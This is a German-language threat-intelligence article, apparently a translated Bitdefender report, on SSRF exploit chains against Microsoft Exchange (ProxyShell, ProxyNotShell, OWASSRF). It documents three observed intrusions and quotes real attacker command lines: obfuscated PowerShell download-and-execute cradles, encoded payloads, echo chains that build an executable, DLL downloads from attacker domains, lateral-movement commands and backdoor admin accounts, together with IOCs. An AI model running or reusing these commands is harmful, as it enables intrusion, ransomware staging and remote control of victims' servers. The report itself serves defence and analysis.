Antivirensoftware Test 2022: Schutz vor den neuesten Bedrohungen

Diagramm zur Service-orientierten Architektur

Die digitale Welt entwickelt sich rasant weiter, und mit ihr die ausgeklügelten Methoden von Cyberkriminellen. Insbesondere Microsoft Exchange-Systeme sind ins Visier geraten. Ende 2022 beobachteten Sicherheitsexperten von Bitdefender Labs einen Anstieg von Angriffen, die auf die Ausnutzung von ProxyNotShell/OWASSRF-Exploits abzielten, um Microsoft Exchange-Bereitstellungen zu kompromittieren. Server-Side Request Forgery (SSRF)-Angriffe auf Microsoft Exchange-Server gehören zu den beliebtesten und am häufigsten ausgenutzten Schwachstellen. Dieser Artikel beleuchtet die technischen Details dieser Angriffe und gibt Einblicke in die jüngsten Angriffsvektoren, die in freier Wildbahn entdeckt wurden.

Serviceorientierte Architektur als Grundlage

Die serviceorientierte Architektur (SOA) hat sich über lange Zeit bewährt. Sie ist ein Ansatz im Software-Design, bei dem ein System als Sammlung von Diensten organisiert wird, die über klar definierte Schnittstellen miteinander kommunizieren. Das Hauptziel von SOA ist es, die unabhängige Entwicklung und Wartung verschiedener Softwarekomponenten zu ermöglichen und deren Wiederverwendung in unterschiedlichen Kombinationen zur Erstellung neuer Systeme zu fördern. Einer der Hauptvorteile von SOA liegt in der erhöhten Flexibilität und Skalierbarkeit durch die Auflösung von Anwendungs grenzen. Dieses Konzept brachte jedoch neue Sicherheitsherausforderungen mit sich, da Sicherheitsmodelle nicht mehr fest in die Anwendungen integriert sind. Ein gängiger Ansatz ist die Bereitstellung einer begrenzten Anzahl gehärteter Service-Endpunkte, die als Proxy für andere Dienste fungieren. Ein “Endpunkt” bezieht sich hierbei nicht auf ein physisches Gerät, sondern auf eine netzwerkadressierbare Schnittstelle eines Dienstes, typischerweise eine URL, über die mit einer Dienstkomponente interagiert werden kann.

Diagramm zur Service-orientierten ArchitekturDiagramm zur Service-orientierten Architektur*Abb. 1 – Grundlegende Implementierung eines Proxy-Service-Endpunkts*

Microsoft Exchange – Eine scheinbar unüberwindbare Hürde?

Microsoft Exchange ist ein Beispiel für eine Anwendung, die Proxydienste nutzt, um das sensible Backend vor dem unvertrauenswürdigen öffentlichen Netzwerk zu schützen. Über die Jahre entwickelte sich die Philosophie von Microsoft Exchange hin zum Prinzip der Ko-Lokation – alle Exchange-Server (außer Edge Transport-Servern) sind Multi-Rollen-Server und setzen auf die Trennung der Rollen. Die Client Access Services (CAS) bilden die Schicht, die für die Annahme aller Arten von Client-Verbindungen (Front-End) und deren Weiterleitung an Back-End-Dienste zuständig ist.

Übersicht über die Microsoft Exchange-ArchitekturÜbersicht über die Microsoft Exchange-Architektur*Abb. 2 – Hochrangige Übersicht der Microsoft Exchange-Architektur*

Da CAS und die Backend-Dienste auf demselben Exchange Mailbox-Server gehostet werden, müssen Sicherheitskontrollen vorhanden sein. Backend-Dienste akzeptieren nur Anfragen mit einem gültigen Kerberos-Token von CAS. Selbst wenn man direkten Zugriff auf diese Dienste hätte, würden sie alle Verbindungen ablehnen, die nicht von einem der CAS-Dienste stammen.

Exchange-Backend-ValidierungExchange-Backend-Validierung*Abb. 3 – Das Exchange-Backend validiert, dass Anfragen von vertrauenswürdigen Frontends stammen, mittels eines Autorisierungsheaders*

Server-Side Request Forgery (SSRF) – Die unterschätzte Schwachstelle

Wie bei vielen anderen “Secure-by-Design”-Architekturen wurden auch hier schnell neue Angriffstechniken entdeckt, um diese scheinbar sicheren Systeme ins Visier zu nehmen. Server-Side Request Forgery (SSRF) ist eine Angriffsart, die es einem Angreifer ermöglicht, eine manipulierte Anfrage von einem anfälligen Server an einen anderen Server zu senden, im Namen des anfälligen Servers. Dies kann dem Angreifer den Zugriff auf Ressourcen oder Informationen ermöglichen, die ihm sonst nicht direkt zugänglich wären, und ihm erlauben, Aktionen im Namen des anfälligen Servers durchzuführen.

Beispielsweise könnte ein Angreifer, wenn eine Webanwendung anfällig für SSRF ist, eine Anfrage vom anfälligen Server an eine lokale Netzwerkressource senden, die für den Angreifer normalerweise nicht zugänglich ist, wie etwa eine Datenbank. Alternativ könnte der Angreifer eine Anfrage an einen externen Server, wie z. B. einen Cloud-Dienst, senden, um Aktionen im Namen des anfälligen Servers durchzuführen. Um einen SSRF-Angriff erfolgreich durchzuführen, muss der Angreifer in der Lage sein, eine Anfrage vom anfälligen Server zu senden und den Inhalt der Anfrage so zu manipulieren, dass er die gewünschten Ressourcen abrufen oder die gewünschten Aktionen ausführen kann.

Weiterlesen >>  Excel Summe Wenn: Datenanalyse leicht gemacht für kleine Datensätze

Beispiel eines SSRF-AngriffsBeispiel eines SSRF-Angriffs*Abb. 4 – Beispiel eines SSRF-Angriffs auf einen Proxy-Service-Endpunkt*

Angriffe auf Microsoft Exchange – Der Beginn der Problematik

Die meisten von Sicherheitsexperten entdeckten Schwachstellen basieren auf fehlerhaften Implementierungen, wie z. B. Speicherfehlern oder Code-Injektionen. Es ist eher selten, Schwachstellen in der übergeordneten Architektur zu finden. Architektur-Schwachstellen sind in Produktionssystemen schwer zu beheben, insbesondere bei weit verbreiteter Software, bei der die Abwärtskompatibilität eine wichtige Funktion darstellt – wie bei Microsoft Exchange-Servern.

Anfang 2021 konzentrierten sich Sicherheitsexperten wie Orange Tsai und das DEVCORE Research Team genauer auf die CAS-Implementierung. Sie entdeckten nicht nur mehrere kritische Schwachstellen, sondern identifizierten CAS auch als neue Angriffsfläche, die seit Exchange 2013 auf allen Microsoft Exchange-Servern vorhanden ist. Die CAS-Implementierung auf lokalen Microsoft Exchange-Servern ist anfällig für SSRF-Angriffe. Diese anfängliche Entdeckung war jedoch nur die Spitze des Eisbergs.

Microsoft Exchange CAS anfällig für SSRFMicrosoft Exchange CAS anfällig für SSRF*Abb. 5 – Microsoft Exchange CAS ist anfällig für SSRF-Angriffe*

SSRF-Angriffe sind typischerweise auf die Kompromittierung der Verfügbarkeit oder Vertraulichkeit beschränkt, wie z. B. Denial of Service oder die Offenlegung sensibler Daten. In Kombination mit anderen Schwachstellen können sie jedoch Exploit-Ketten bilden, die zur Ausführung von Remote-Code (RCE) führen.

Betrachten wir eine dieser Exploit-Ketten genauer, um zu verstehen, wie Exploits zusammenwirken. Wir verwenden ProxyShell als Beispiel, eine Kombination aus drei verschiedenen Exploits. Der erste Exploit ist der bekannte SSRF-Angriff, der SYSTEM-Zugriff auf die Backend-Dienste gewährt. Da SYSTEM keine angebundenen Mailboxen hat, nutzt der Angreifer einen Exploit zur Privilegienerweiterung, um seinen Zugriff auf ein Domänenkonto “herabzustufen”. Als Nächstes speichert der Angreifer den Code der Web-Shell als E-Mail in der Mailbox-Datenbank. Mithilfe von PowerShell Remoting wird diese E-Mail dann mithilfe des Cmdlets New-MailBoxExportRequest als .pst-Datei exportiert, jedoch mit der Endung .aspx (die anfällige Version von Exchange validiert die Dateiendung nicht). Da die Permutationskodierung, die das PST-Dateiformat verwendet, gut dokumentiert ist, wird der verschlüsselte Web-Shell-Code in einem Format gespeichert, das während des Exportvorgangs automatisch entschlüsselt wird (clever!).

ProxyShell Exploit-KetteProxyShell Exploit-Kette*Abb. 6 – ProxyShell Exploit-Kette*

Microsoft Exchange ist aus mehreren Gründen ein ideales Ziel für diese Exploit-Ketten:

  • Es existiert ein komplexes Netzwerk von Frontend- und Backend-Diensten mit Legacy-Code zur Gewährleistung der Abwärtskompatibilität (viele-zu-viele-Beziehungen).
  • Backend-Dienste vertrauen den Anfragen von der Frontend-CAS-Schicht – im Falle eines SSRF-Angriffs wird ein gültiges Kerberos-Token von CAS generiert.
  • Mehrere Backend-Dienste laufen als Exchange Server selbst (SYSTEM-Konto).
  • Remote PowerShell (RPS) umfasst Hunderte von PowerShell-Cmdlets.

Innerhalb relativ kurzer Zeit wurden mehrere Kombinationen von Schwachstellen entdeckt:

  • ProxyLogon – Die ursprüngliche Exploit-Kette war eine Kombination aus CVE-2021-26855 und CVE-2021-27065. Das Ergebnis war eine RCE-Kette, die keine Authentifizierung erforderte.
  • ProxyShell – Die zweite Exploit-Kette war eine Kombination aus CVE-2021-34473, CVE-2021-34523 und CVE-2021-31207. Das Ergebnis war eine RCE-Kette, die keine Authentifizierung erforderte.
  • ProxyNotShell – Diese Exploit-Kette war eine Kombination aus CVE-2022-41080 und CVE-2022-41082. Obwohl diese RCE-Kette eine Authentifizierung erfordert, können beliebige gültige Anmeldeinformationen zur Eskalation des Zugriffs verwendet werden.
  • OWASSRF – Zuerst von Crowdstrike gemeldet, nutzt diese Exploit-Kette die gleiche Kombination von Schwachstellen wie ProxyNotShell. Der Unterschied besteht darin, dass anstelle des Autodiscover-Dienstendpunkts der OWA-Dienstendpunkt des CAS-Frontends verwendet wird. Durch Änderung des vom SSRF-Angriff anvisierten Dienstendpunkts können Bedrohungsakteure die von Microsoft bereitgestellten Abhilfemaßnahmen umgehen.
Weiterlesen >>  Annuitätendarlehen in Excel berechnen: Ihr umfassender Leitfaden zum Finanzierungs-Controlling

Diese Liste von Exploit-Ketten ist keineswegs vollständig – es gibt weitere Ketten, die Autodiscover- und OWA-Dienste ausnutzen. Es ist nicht überraschend, dass diese Exchange-Schwachstellen sowohl in den Top 2021 routinemäßig ausgenutzten Schwachstellen als auch in den Top CVEs, die aktiv von staatlich gesponserten Cyberakteuren der Volksrepublik China ausgenutzt werden (Stand Oktober 2022) aufgeführt sind.

Aktuelle Entwicklungen und reale Angriffe

In diesem abschließenden Abschnitt werfen wir einen Blick auf einige reale Angriffe, die unsere Experten in den Bitdefender Labs entdeckt haben. Ende November 2022 registrierten wir eine erhöhte Nutzung von ProxyNotShell/OWASSRF zur Ausführung bösartiger Befehle.

Die Angriffsziele befanden sich überwiegend in den Vereinigten Staaten, aber auch Unternehmen aus Polen, Österreich, Kuwait und der Türkei waren betroffen. Die Branchen dieser Opfer umfassten Immobilien, Anwaltskanzleien, Fertigung, Beratung, Großhandel sowie Kunst und Unterhaltung. Wie erwartet, handelte es sich bei den meisten dieser Angriffe um opportunistische Attacken und nicht um gezielte Aktionen.

Fall 1 – Tools für Fernverwaltung

Im ersten Fall nutzten Angreifer die ProxyNotShell-Exploit-Kette und versuchten, zwei verschiedene Fernzugriffstools zu installieren. Das erste Tool war Meterpreter – eine Metasploit-Attack-Payload, die eine interaktive Shell bereitstellt und mittels In-Memory-DLL-Injection eingesetzt wird. Das zweite war ConnectWise Control (früher bekannt als ScreenConnect).

Beispiele für während dieses Angriffs erkannte (und blockierte) Befehlszeilen:

Befehlszeilenbeispiele
msiexec /q /i c:\windows\temp\c.msi powershell -nop -c $ds = 'D' + 'Own' + 'LOa' + 'DfI' + 'le'; Invoke-Expression (New-Object Net.WebClient).$ds.Invoke('https://autodiscover.hofd***[.]org/owa/auth/Current/themes/resources/6.css', 'c:\windows\temp\c.msi')
rundll32 c:\windows\temp\l.ttf,guewik powershell -nop -c $ds = 'D' + 'Own' + 'LOa' + 'DfI' + 'le'; Invoke-Expression (New-Object Net.WebClient).$ds.Invoke('https://mail.fcp***[.]us/owa/auth/Current/themes/resources/ls.css', 'c:\windows\temp\l.ttf') msiexec /q /i c:\windows\temp\nn.msi powershell -nop -c Invoke-Expression (New-Object Net.WebClient).DownloadFile.Invoke('https://mail.fcp***[.]us/owa/auth/Current/themes/resources/a.css', 'c:\windows\temp\nn.msi')
msiexec /q /i c:\windows\temp\ss.msi powershell -nop -c $ds = 'D' + 'Own' + 'LOa' + 'DfI' + 'le'; Invoke-Expression (New-Object Net.WebClient).$ds.Invoke('https://autodiscover.livi***.org/owa/auth/Current/themes/resources/ss.msi')
powershell.exe -e cABvAHcAZQByAHMAaABlAGwAbAAgAC0AbgBvAHAAIAAtAGMAIABJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAuAEkAbgB2AG8AawBlACgAJwBoAHQAdABwAHMAOgAvAC8AYQB1AHQAbwBkAGkAcwBjAG8AdgBlAHIALgBoAG8 <redacted> AC8AbwB3AGEALwBhAHUAdABoAC8AQwB1AHIAcgBlAG4AdAAvAHQAaABlAG0AZQBzAC8AcgBlAHMAbwB1AHIAYwBlAHMALwA2AC4AYwBzAHMAJwAsACAAJwBjADoAXAB3AGkAbgBkAG8AdwBzAFwAdABlAG0AcABcAGMALgBtAHMAaQAnACkACgA= powershell.exe -e bQBzAGkAZQB4AGUAYwAgAC8AcQAgAC8AaQAgAGMAOgBcAHcAaQBuAGQAbwB3AHMAXAB0AGUAbQBwAFwAYwAuAG0AcwBpAAoA powershell.exe -e dwBoAG8AYQBtAGkACgA=

Die Angriffe wurden von den IP-Adressen 64.190.113[.]48 und 162.243.150[.]6 gestartet. Alle Stage-Server, von denen die Payload heruntergeladen wurde, sind bereits kompromittierte Microsoft Exchange-Server, höchstwahrscheinlich auf die gleiche Weise kompromittiert.

URLMD5 des heruntergeladenen InhaltsAnmerkungen
https://autodiscover.hofd***.org/owa/auth/Current/themes/resources/mb.cssd375f2fab8e85975cc19a60a6aebca94Downloader für Meterpreter mit C&C 162.243.150[.]6
https://autodiscover.hofd***.org/owa/auth/Current/themes/resources/6.css43250dd7f3a01c689131849c39f36482ConnectWise Control über den Relay-Server 66.42.116[.]130:443
https://mail.fcp***.us/owa/auth/Current/themes/resources/ls.cssd765cf358376604b90eba4f5dccb4ceaDownloader für Meterpreter mit C&C 64.190.113[.]48
https://mail.fcp***[.]us/owa/auth/Current/themes/resources/a.css5d08e4593bc214dc4c86064fb8a1c776ConnectWise Control über den Relay-Server 91.206.178[.]76:443
https://mail.fcp***[.]us/owa/auth/Current/themes/resources/b.css80ce2d5f2689a7c5ccf13843c962c6f1ConnectWise Control über den Relay-Server 155.138.240[.]251:443
https://mail.st*********.org/owa/auth/Current/themes/resources/6.css43250dd7f3a01c689131849c39f36482ConnectWise Control über den Relay-Server 66.42.116[.]130:443
https://autodiscover.livi***.org/owa/auth/Current/themes/resources/ss.cssa60f1c6e19d09661ca61502603ada352ConnectWise Control über den Relay-Server 45.77.91[.]209:443
https://mail.o***.ca/owa/auth/Current/themes/resources/4.cssdaf0b4b216ef9e046af3c863eea559a7ConnectWise Control über den Relay-Server 45.77.146[.]144:443
https://mail.o***.ca/owa/auth/Current/themes/resources/mc.css8de8561f2440281155bbfe20666643faConnectWise Control über den Relay-Server 149.28.249[.]156:443

Alle URLs und Befehlszeilen wurden blockiert. Es ist anzunehmen, dass die Bereitstellung von Ransomware das wahrscheinlichste Ziel der Angreifer war.

Fall 2 – Initial Access Broker

Im zweiten Fall versuchten Angreifer, Persistenz auf dem kompromittierten System über Web-Shells zu etablieren. Eine Web-Shell ist ein bösartiges Programm (oder Skript), das auf einen Webserver hochgeladen wird, um unbefugten Zugriff auf den Server zu erlangen. Nach der Bereitstellung einer Web-Shell kann ein Angreifer beliebige Befehle oder Skripte ausführen und eine Vielzahl von Aktionen durchführen, wie z. B. das Hochladen zusätzlicher Malware, das Stehlen sensibler Daten oder das Starten von Angriffen auf andere Systeme.

Web-Shells werden häufig von Initial Access Brokern (IAB) verwendet. Ein Initial Access Broker ist eine Art Cyberkrimineller, der sich darauf spezialisiert, initialen Zugriff auf das Netzwerk einer Zielorganisation zu erlangen. Nach Erlangung des initialen Zugriffs kann der Access Broker den Zugriff auf das kompromittierte Netzwerk an andere kriminelle Gruppen verkaufen oder vermieten.

Schwachstellen wie Exchange-Proxy-Exploit-Ketten sind eine Goldgrube für Access Broker, da diese oft opportunistische Angriffe anstelle von gezielten bevorzugen. Mit dem Aufkommen von Ransomware-as-a-Service-Gruppen können Initial Access Broker eine stetige Versorgung potenzieller Ransomware-Ziele für Ransomware-Affiliates bereitstellen.

Weiterlesen >>  Kostenlose Excel Projektplan Vorlage: Effizient Projekte managen

Bei diesem Angriff werden mehrere Echo-Befehle verkettet, um eine Base64-kodierte ausführbare Datei auf der Festplatte zu generieren.

Befehlszeilenbeispiele (Echo-Ketten)
cmd.exe /c echo TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAA...AIPCQIsIUWig0EAAUv/W5UUM&gt;&gt;%TEMP%\\sMIod.b64
cmd.exe /c echo cwgj6CEtUgChGNBAAOKA8IsNENBAADtSfiuLVQyLDcjA...YGgslQAAUVDo14kAABhQaK+H&gt;&gt;%TEMP%\\sMIod.b64
cmd.exe /c echo MACF1otNvItVuB9F3FGLTdhSi5V8//8fUIuFeIX//1GL...AACLkzQ9AJwr94uDVAgAIRvC&gt;&gt;%TEMP%\\sMIod.b64
cmd.exe /c echo O7d/CnzBO89qBDPJXcCJThiJRhz/zEhOAAAqgyQISwA+...9nU0hf8udXIbtwAAQlOJdfzo&gt;&gt;%TEMP%\\sMIod.b64
cmd.exe /c echo 7BUAAIt1CDP/hX7zAnVhixZqAWpragAGzfdMAAA9dhEj...UegZeQAAUP8VkMBqAF3CWJ07&gt;&gt;%TEMP%\\sMIod.b64
cmd.exe /c echo kL+QMJCQkJCQkJCQkP0q7ItFEFaLdaNXNKgI3UgZi1AQ...lF7/dYPEwV3DkJCQkJCQkJCQ&gt;&gt;%TEMP%\\sMIod.b64
cmd.exe /c echo kJCkkJDbVYvsg+xcK0UIU59XdSBXi30YPGNBHItNHI1F...AIPEkIXAddmLRZC7BAAUAFOD&gt;&gt;%TEMP%\\sMIod.b64
cmd.exe /c echo wAhogDCtAFD/dgTBJO6DxAyFwHUOi00qJAbTAABmx0EM...PlKJRfzJiPjonfP//0J7SAEA&gt;&gt;%TEMP%\\sMIod.b64
cmd.exe /c echo JFPozQMPADPJiUUIO8F0FYtDWFDo7/P/p4tFCJNcCovl...TIzNDU2Nzg5AAAAAAAAAAAA&gt;&gt;%TEMP%\\sMIod.b64
cmd.exe /c echo AAAAAgAAAgAAAAAAAAAAAAAAAAAAAAAAAAEBAgEDAwMD...dGhhbiB0d2ljZSB0aGUgc3Rh&gt;&gt;%TEMP%\\sMIod.b64
cmd.exe /c echo bmRhcmQKICAgICAgIGRldmlhdGlvbiBhcGFydC4gVGhl...aWxlICAgICAgRmlsZSBjb250&gt;&gt;%TEMP%\\sMIod.b64
cmd.exe /c echo YWluaW5nIGRhdGEgdG8gUFVULiBSZW1lbWJlciBhbHNv...AAAAAAAAAAAAAAAAAAAAAAAA&gt;&gt;%TEMP%\\sMIod.b64
cmd.exe /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...AAAAAAAAAAAAAAAAAAAAAAAA&gt;&gt;%TEMP%\\sMIod.b64
cmd.exe /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...ZWxlYXNlXGFiLnBkYgA=&gt;&gt;%TEMP%\\sMIod.b64

Die Echo-Kette wird auch verwendet, um eine VBScript-Datei am Speicherort <span data-contrast="auto">%TEMP%qawWu.vbs</span> zu erstellen. Nach der Ausführung dieser VBscript-Datei liest sie den Inhalt der Base64-Datei <span data-contrast="auto">sMIod.b64</span>, dekodiert den Inhalt und speichert ihn an einem neuen Speicherort %TEMP%ujjQl.exe. Nach dieser Operation wird die ausführbare Datei gestartet und beide Dateien sMIod.b64 und <span data-contrast="auto">qawWu.vbs</span> werden gelöscht.

Diagramm eines Angriffs zur Erstellung von Web-ShellsDiagramm eines Angriffs zur Erstellung von Web-Shells

Nach der Ausführung von ujjQl.exe lädt diese bösartige ausführbare Datei eine weitere ausführbare Datei von http://mail.p***a.com/owa/auth/data.zip (MD5 ad362104eea7afcd727b77e89a4a5e2e) herunter. Als Ergebnis dieser Operation werden zwei .aspx-Dateien (Web-Shells) an den folgenden Speicherorten erstellt:

  • <span data-contrast="auto">%ExchangeInstallPath%FrontEndHttpProxyecpauthLogout.aspx</span> (MD5 ad086021b7ee50ff5b9acec4d79736be)
  • %SystemDrive%inetpubwwwrootaspnet_clientsystem_web\iisstart.aspx (MD5 607a6987395f02086e0e355c9ba4d76e)

Fall 3 – Cuba Ransomware

In diesem Fall nutzten Angreifer die ProxyNotShell-Exploit-Kette, um PowerShell-Befehle auszuführen. Zunächst versuchten sie, die Datei <span data-contrast="auto">komar<xx>.dll</xx></span> herunterzuladen, die wir als Bughatch-Downloader identifiziert haben. Bughatch wird bekanntermaßen in Cuba-Ransomware-Operationen eingesetzt, unsere Zuordnung basiert jedoch hauptsächlich auf vielen bekannten IOCs und wiederverwendeter Infrastruktur. Nachdem die Download-Befehle blockiert wurden, fuhren sie mit der unbeaufsichtigten (stummgeschalteten) Installation des GoToAssist-Tools fort. GoToAssist ist eine legitime Fernsupport-Software von LogMeIn Inc.

Ausgeführte Befehle
c:\windows\system32\inetsrv\w3wp.exe -ap "MSExchangePowerShellAppPool" -v "v4.0" -c <redacted>
powershell (New-Object Net.WebClient).DownloadFile('https://lostbussiness[.]com:443/ga.exe', 'C:programdataga.exe')
C:programdataga.exe
powershell (New-Object Net.WebClient).DownloadFile('https://devoterfo[.]com:443/komar66.dll', 'C:programdatakomar66.dll')
rundll32.exe c:programdatakomar66.dll,?Show@CConfigDlg@@QEAAXXZ
powershell (New-Object Net.WebClient).DownloadFile('https://devoterfo[.]com:443/komar64.dll', 'C:windowstempkomar64.dll')
RunDll32 C:windowstempkomar64.dll,ConvertPng
powershell (New-Object Net.WebClient).DownloadFile('https://devoterfo[.]com:443/ga.exe', 'C:programdataga.exe')
C:programdataga.exe
C:Program Files (x86)GoToAssist Remote Support Unattended1847923225473922339GoToAssistUnattended.exe
powershell (New-Object Net.WebClient).DownloadFile('https://devoterfo[.]com:443/addp.dll', 'C:programdataaddp.dll')
RunDll32 C:programdataaddp.dll,Start

Die nächste Aktion war die laterale Bewegung mittels GoToAssist:

Befehle zur lateralen Bewegung
cmd.exe /C nltest /dclist:
net group "Domain Admins" /domain
ping
ping <dc2>
cmd.exe /C copy 23-145s.bat \<machine1>C$windowstemp
cmd.exe /C copy 23-145s.dll \<machine1>C$windowstemp
cmd.exe /C copy kk.dll \<machine1>C$windowstemp
cmd.exe /C copy komar65.dll \<machine2>C$windowstemp
cmd.exe /C copy kk65.bat \<machine2>C$windowstemp
cmd.exe /C copy rdp.bat \<machine3>C$windowstemp

Um den Zugriff aufrechtzuerhalten, erstellten die Angreifer auch Benutzerkonten mit lokalen Administratorrechten. Sie versuchten, verschiedene Tools herunterzuladen, wobei einige Dateien über PowerShell und andere über die bereitgestellten Tools heruntergeladen wurden. Die Analyse der heruntergeladenen Tools:

URLMD5 des heruntergeladenen BinärsDetails
https://devoterfo[.]com:443/komar66.dll53c2f5ebde7c5417b2b4081070643da1Lädt eine Shellcode von <span data-contrast="auto">http://38.135.122[.]130/Agent64.bin</span> herunter und führt sie aus; der Download gelingt interessanterweise nur, wenn der User-Agent auf einen der beiden folgenden Werte gesetzt ist: „<span data-contrast="auto">Mozilla/4.0</span>“ und „Mozilla/5.0“; der 4.0 User-Agent wird vom Downloader verwendet und der 5.0 vom finalen Backdoor während des Update-Vorgangs.
https://devoterfo[.]com:443/komar65.dll2c0584f95b33a77e20060cc569a5279aVerhält sich genauso wie komar66.dll
https://devoterfo[.]com:443/komar64.dll617180092c3935de27dfff0090e5de70Verhält sich genauso wie <span>komar66.dll</span>
https://devoterfo[.]com:443/addp.dll43bc56681d4149001119ea87021ea52aErstellt den Benutzer SqlDbAdmin und fügt ihn den lokalen Gruppen Administratoren und Remote Desktop-Benutzer hinzu.
<span data-contrast="auto">https://devoterfo[.]com:443/cps.exe</span>5d700d932297094dda08a7398640cd24Erstellt einen Prozess aus den folgenden Befehlszeilen: „<strong>C:WindowsSysWOW64WindowsPowerShellv1.0powershell.exe -windowstyle hidden -executionpolicy bypass -file C:programdatakomar2.ps1</strong>
<span data-contrast="auto">https://devoterfo[.]com:443/add64s.exe</span>4cf05aa013e641d27ac49b2e2d33d38eErstellt den Benutzer Mysql und fügt ihn den lokalen Gruppen Administratoren und Remote Desktop-Benutzer hinzu; er aktiviert auch RDP, indem er den Registrierungswert <strong>fDenyTSConnections</strong> des Registrierungsschlüssels <strong>HKLMSystemCurrentControlSetControlTerminal Server</strong> auf 0 setzt.
<span data-contrast="auto">https://devoterfo[.]com:443/204109.dll</span>158aad1b5cffd0cc9beab406c5505a03Entschlüsselt und führt